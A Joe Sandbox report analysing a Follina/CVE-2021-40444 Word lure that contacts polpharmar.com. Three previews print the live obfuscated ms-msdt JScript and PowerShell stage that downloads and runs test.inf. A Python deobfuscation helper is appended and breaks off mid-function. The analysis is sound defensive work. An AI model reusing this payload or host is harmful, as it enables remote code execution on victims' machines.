Windows Analysis Report
order.docx

Overview

General Information

Sample Name: order.docx
Analysis ID: 676557
MD5: 8abea2d6c14af54c6eac09d158554085
SHA1: 3802d9c8b3530fe7b140cbd4a12c3895c46077b2
SHA256: aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
Tags: doc, docx, Follina

Detection

CVE-2021-40444
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected CVE-2021-40444 exploit
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1288, cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
No configs have been found
Yara matches (Source / Rule / Description / Author / Strings):
Source: document.xml.rels; Rule: SUSP_Doc_WordXMLRels_May22; Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation; Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x467:$a2: TargetMode="External"
  • 0x43a:$x1: .html!
Source: document.xml.rels; Rule: EXPL_CVE_2021_40444_Document_Rels_XML; Description: Detects indicators found in weaponized documents that exploit CVE-2021-40444; Author: Jeremy Brown / @alteredbytes
  • 0x3f8:$b1: /relationships/oleObject
  • 0x412:$c1: Target="mhtml:http
  • 0x43f:$c2: !x-usc:http
  • 0x467:$c3: TargetMode="External"
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: order.docx; Avira: detected
Source: order.docx; ReversingLabs: Detection: 69%

Exploits

Source: document.xml.rels; Extracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic; DNS query: name: polpharmar.com
Source: global traffic; HTTP traffic detected:
  GET /test.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: polpharmar.com
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /test.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: polpharmar.com
  If-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMT
  Connection: Keep-Alive
Source: Joe Sandbox View; ASN Name: THCPROJECTSRO THCPROJECTSRO
Source: ~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp.0.dr; String found in binary or memory: http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; String found in binary or memory: http://polpharmar.com/test.html%
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; String found in binary or memory: http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; String found in binary or memory: http://polpharmar.com/test.htmlyX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp
Source: unknown; DNS traffic detected: queries for: polpharmar.com
Source: document.xml.rels, type: SAMPLE; Matched rule: SUSP_Doc_WordXMLRels_May22 (date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0)
Source: document.xml.rels, type: SAMPLE; Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML (date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772)
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: order.LNK.0.dr; LNK file: ..\..\..\..\..\Desktop\order.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$order.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVR74D1.tmp
Source: classification engine; Classification label: mal68.expl.evad.winDOCX@1/20@7/1
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; OLE document summary: title field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; OLE document summary: author field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File read: C:\Users\desktop.ini
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: order.docx; Initial sample: OLE zip file path = word/media/image1.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
MITRE ATT&CK matrix (technique name, followed in parentheses by the number of matched signatures where the report shows one):
Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Exploitation for Client Execution (13); Scheduled Task/Job; At (Linux)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: Masquerading (1); Rootkit; Obfuscated Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: File and Directory Discovery (1); System Information Discovery (1); Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Command and Control: Non-Application Layer Protocol (2); Application Layer Protocol (12); Ingress Tool Transfer (2)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data
Antivirus results (Source / Detection / Scanner / Label):
  • order.docx; Detection: 69%; Scanner: ReversingLabs; Label: Document-Office.Exploit.CVE-2021-40444
  • order.docx; Detection: 100%; Scanner: Avira; Label: EXP/CVE-2021-40444.Gen
No Antivirus matches
URL scan results (Source / Detection / Scanner / Label):
  • http://polpharmar.com/test.htmlyX; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
  • http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
  • http://polpharmar.com/test.html%; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
  • http://polpharmar.com/test.html; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
Domains (Name / IP / Active / Malicious / Antivirus Detection / Reputation):
  • polpharmar.com; IP: 91.235.116.180; Active: true; Malicious: true; Reputation: unknown
URLs (Name / Malicious / Antivirus Detection / Reputation):
  • http://polpharmar.com/test.html; Malicious: true; Avira URL Cloud: safe; Reputation: unknown
URLs found in memory or binaries (Name / Source / Malicious / Antivirus Detection / Reputation):
  • http://polpharmar.com/test.htmlyX; Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; Malicious: false; Avira URL Cloud: safe; Reputation: unknown
  • http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html; Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; Malicious: false; Avira URL Cloud: safe; Reputation: unknown
  • http://polpharmar.com/test.html%; Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr; Malicious: false; Avira URL Cloud: safe; Reputation: unknown
IPs (IP / Domain / Country / ASN / ASN Name / Malicious):
  • 91.235.116.180; Domain: polpharmar.com; Country: Romania; ASN: 51177; ASN Name: THCPROJECTSRO; Malicious: true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 676557
Start date and time: 2022-08-01 10:48:37 +02:00
Joe Sandbox Product: Cloud Basic
Overall analysis duration: 0h 5m 4s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: order.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal68.expl.evad.winDOCX@1/20@7/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .docx
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • VT rate limit hit for: order.docx
No simulations
Context for IP 91.235.116.180 (associated sample names from other analyses; Detection: malicious): IMG2_518876978.vbs, ITEMS 222940.exe, Wire_Notification_Preview08645.htm, 56Reffpaymen#9989.exe
No context
Context for ASN THCPROJECTSRO: associated with further malicious samples in other analyses.
No context
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 131072
Entropy (8bit): 0.28806523107588966
Encrypted: false
SSDEEP: 48:I35TRB9NE4co0pOXJL2lgH2SEAFdGJhLeo7dgThb87lrTArRmLRm/H:K5TLchZGJSlnfSdchmtw7pEH
MD5: 69E01CD5678E2F435A5DA3DD7098792D
SHA1: CD9B07B23BC125CA6AA49FA9ABF57D19D475F488
SHA-256: 4891EF6EBC9EFA8EE67F0B6A02B2C3D4C76D13AF8B23DA56FC5F82F94325EA8D
SHA-512: FDFB7DC1C79983438B5F5162AA1DAB10B28A6FF4F3D24B1F8E85C0275C449305D8DDF6FA75710CB8E9AA1C3E0FEFE6EB32579782B1E75B7D91A9426102D6A158
Malicious: false
Reputation: low
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.6680333186685128
            Encrypted:false
            SSDEEP:96:KxaCyc4zzRrdrhr1elVrf7oGzx54HU0HU5LLs1BQM8rDdTM8rDk9rrFF9rrF:jc45Np1eXMGzDU78LsHQ7tT7sFHF
            MD5:0F9367D91948664C4F0693A5B2D1F022
            SHA1:87640D1AE4FF977D2262FB54BFC5B84DB76EDFB2
            SHA-256:F5B4FDE36B3E368EE7C6E745D715BE2658F830B88C6F411D82C3E16B0BC713B6
            SHA-512:FEB40E2A419901F30C4FB9EBDEF7713D947AE18421D5B97270DF5B067F42D0D3EAEFFEE6620DB83B5BADA053367C5960F767E71A021140A47723607FCF440318
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z./Hx...O.R..@...S,...X.F...Fa.q.............................#.JA..@....K.L...............G....#..2.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.9684196678119985
            Encrypted:false
            SSDEEP:3:yVlgsRlzolVJIyrnWWDhPN3IlkNlZZglc9NCR5l276:yPblzolUW1T4+wlc9ot22
            MD5:B3F9E95F032199D9FFC42A0D17DB4430
            SHA1:3B883B7D1150D9832CBC819C1852D96B2FD6FF21
            SHA-256:9A45C47B86B253B8AF932AF843250F11E722706F79CDDB7D103971C08E4F8C29
            SHA-512:773C82C9CB1E761B3051473129F93AC19DE9BD4E8C9F437176BEC12D308CF27A5E6260A6D47E5E3F2609C9BBC7A0B625D72EE29C781275A335CA996066F6B2A7
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.B.D.A.0.6.7.B.C.-.A.8.5.F.-.4.D.0.9.-.B.1.E.2.-.A.2.7.A.2.6.2.5.9.E.7.2.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.2879180121063263
            Encrypted:false
            SSDEEP:48:I3sRBLontTzybGrn7ndxYyK2cw/SgR5ErBQqeQqNH:KsLMnJzybyn7nrYy3DUBQ5Q+H
            MD5:12C0319349817D1200BD72928EFF5130
            SHA1:2659A8308AC1006515BFDF4D53B14C9F69F7E102
            SHA-256:9C3F839DC9BE9306C246846AFE3ADBBABB4A4D91210176C0B00AC7D7CBAB88D3
            SHA-512:D00FE147BB8D3089B1927875019FA13F5401C62FA82A33821E22AE94DDF8CB7273365748558184B0BF12FEFAC93D2B089BD9B14BDFE5C4CFAA33928D0FB26BE3
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z.......E.....qi.S,...X.F...Fa.q.............................K.$..9N..5.S..|............h..G..vRq*...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.22123534710596615
            Encrypted:false
            SSDEEP:48:I3fZUrBKp51f1h0gL1U0/k1t81Z1tubFpZ+18Z+11:KfZCKp51f1z1jk1W1Z1t0o18o11
            MD5:05B01089293DF5BB27FED11ECA430E6F
            SHA1:92D1D51F3A1262A740E2239D66759BD14F5583DB
            SHA-256:8DFBEF5045064D09CC51B199192171E1B147A5404F9EA799B4260F960E56AAC7
            SHA-512:48EE074EA044A608B5BEF00AF6B72A5865E58F133C16C3FFCEB35D568B7332F49052689340204F119666B15B17F0DB3C4794C3C026CA13F5E1955F13B78B1677
            Malicious:false
            Reputation:low
            Preview:......M.eFy...zxM.I.70E....Ua.ZS,...X.F...Fa.q.............................{.....A..N...s..............J........P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.9574976283572916
            Encrypted:false
            SSDEEP:3:yVlgsRlz4jlG9KSlhmSLlYnPkRIlPSNr7ljtlWglIRZ276:yPblzqhSaS6nPkRIdSPpYglIf22
            MD5:47E62973D3D4A696C9CB8D121EC7DDAA
            SHA1:43F1A500741C399A6ADC55BC1013BB0F917F2F20
            SHA-256:209521C1D97FEA95A89C0C09038668F492955E29CDB45180C891D78B86782AB9
            SHA-512:DA70307E906E96DFD37DAF5201FB02B6F9CAFE8D4E9455B4FF98DE61E43861C0CB244578AA768ED238DA95CEDBD8A1FEC016F8AD8F4FA2018B20602BD9E435F4
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.8.7.F.A.B.0.B.5.-.C.E.0.C.-.4.4.8.4.-.8.0.A.4.-.0.7.2.1.7.6.0.F.3.A.7.E.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
            Category:downloaded
            Size (bytes):12744
            Entropy (8bit):6.075581200829705
            Encrypted:false
            SSDEEP:192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
            MD5:2E15CCD20E7E02ED1F80CB3557FA4E89
            SHA1:B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
            SHA-256:78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
            SHA-512:FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
            Malicious:false
            Reputation:low
            IE Cache URL:http://polpharmar.com/test.html
            Preview:<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2453x3509, frames 3
            Category:dropped
            Size (bytes):428988
            Entropy (8bit):7.450719655008162
            Encrypted:false
            SSDEEP:12288:hMx4+OsFSHQoWeN/aj0k6GgqPbTwlc08ZJ:hMmWeN/XegqPb7J
            MD5:E8C7DD6A2DED0B1A7C8F5C15FE284802
            SHA1:B93D9DC1405EE585DEC160FD0B0E7F2AF0D269A0
            SHA-256:82C2564BFE32D9FCA3B4919AD2FAA4AD8DFCBEC0DD7A1C50C7B1228DD6FF2AB4
            SHA-512:6100C0A1C357E6B05AFE3367B9CA5425C2FE81393E35B1297F9D7AFC5F1F07832B9CD0C26E9142A3BEE6086C6201BE2F2F4345A09044A8DBA49EEAF91B882FEF
            Malicious:false
            Reputation:low
            Preview:......JFIF.....,.,.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
            Category:dropped
            Size (bytes):12744
            Entropy (8bit):6.075581200829705
            Encrypted:false
            SSDEEP:192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
            MD5:2E15CCD20E7E02ED1F80CB3557FA4E89
            SHA1:B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
            SHA-256:78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
            SHA-512:FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
            Malicious:false
            Reputation:low
            Preview:<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
            Category:dropped
            Size (bytes):12744
            Entropy (8bit):6.075581200829705
            Encrypted:false
            SSDEEP:192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
            MD5:2E15CCD20E7E02ED1F80CB3557FA4E89
            SHA1:B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
            SHA-256:78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
            SHA-512:FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
            Malicious:false
            Reputation:low
            Preview:<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L
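The dropped test.html above (MD5 2E15CCD20E7E02ED1F80CB3557FA4E89, fetched from http://polpharmar.com/test.html) is the ms-msdt stage of the Follina technique (CVE-2022-30190): a JScript `location.href` assembled from concatenated fragments yields an `ms-msdt:/ID PCWDiagnostic` URL whose `IT_BrowseForFile` parameter carries a PowerShell one-liner, which in turn base64-decodes a second stage. The script below is an added example and not part of the Joe Sandbox report: it folds the JScript string concatenation and the PowerShell `[char]` casts, locates the base64 blob, decodes it leniently (the report's preview cuts the blob off mid-quantum, so a strict decoder would reject it) and pulls out the URL and drop path. The only input is the `location.href` statement copied from the preview; the function and variable names are my own.

```python
from __future__ import annotations

import base64
import re

# Constructed sample input: the obfuscated `location.href` statement from the
# dropped test.html in this report, copied from the preview and truncated
# exactly where the preview ends (the last JScript literal is never closed).
SAMPLE_JSCRIPT = r'''location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L'''


def fold_js_strings(js: str) -> tuple[str, bool]:
    """Concatenate the double-quoted literals of a `"a" + "b" + ...` expression.

    Returns (folded_text, truncated). `truncated` is True when the input ends
    inside a literal, which is what a cut-off sandbox preview looks like.
    """
    out, i, n, truncated = [], 0, len(js), False
    while i < n:
        if js[i] != '"':
            i += 1  # skip `+`, whitespace and the `location.href =` prefix
            continue
        i += 1  # past the opening quote
        buf = []
        while i < n and js[i] != '"':
            if js[i] == "\\" and i + 1 < n:
                buf.append(js[i + 1])  # \" and \\ become the escaped character
                i += 2
            else:
                buf.append(js[i])
                i += 1
        truncated = truncated or i >= n  # ran off the end without a closing quote
        out.append("".join(buf))
        i += 1  # past the closing quote (or past the end on truncation)
    return "".join(out), truncated


def fold_powershell_chars(ps: str) -> str:
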